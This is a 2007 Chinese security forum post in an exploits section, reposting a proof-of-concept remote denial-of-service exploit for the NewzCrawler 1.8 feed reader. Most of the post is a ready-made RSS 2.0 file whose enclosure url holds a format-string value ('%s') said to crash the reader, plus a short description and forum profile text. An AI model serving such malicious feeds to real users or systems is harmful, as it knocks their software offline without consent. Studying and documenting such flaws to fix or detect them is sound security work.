NewzCrawler 1.8 (invalid string) Remote Denial of Service Exploit

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1113 小时
注册时间: 2007-10-23
最后登录: 2008-10-6

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-5-23 12:08 只看该作者

NewzCrawler 1.8 (invalid string) Remote Denial of Service Exploit

复制内容到剪贴板

代码:

&#65279;NewzCrawler 1.8 Remote Denial of Service

Credits: gbr

Tested on Windows XP SP2



NewzCrawler 1.8 becomes usntable and begin crash when parsering the &#39;url&#39; atribute of

&#39;enclosure&#39; sub-element contends some invalid string* at time of show a new item of a 

RSS 2.0 file.



* &#39;%s&#39;, &#39;%Y&#39;, &#39;%%&#39;, &#39;n,&#39;, and others.



PoC:



<?xml version="1.0"?>

<rss version="2.0">



<channel>

    <title>Test</title>

    <link></link>

    <description></description>



    <item>

        <title>Remote DoS PoC</title>

        <enclosure url="%s"/>

    </item>

</channel>

</rss>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » NewzCrawler 1.8 (invalid string) Remote Denial of Service Exploit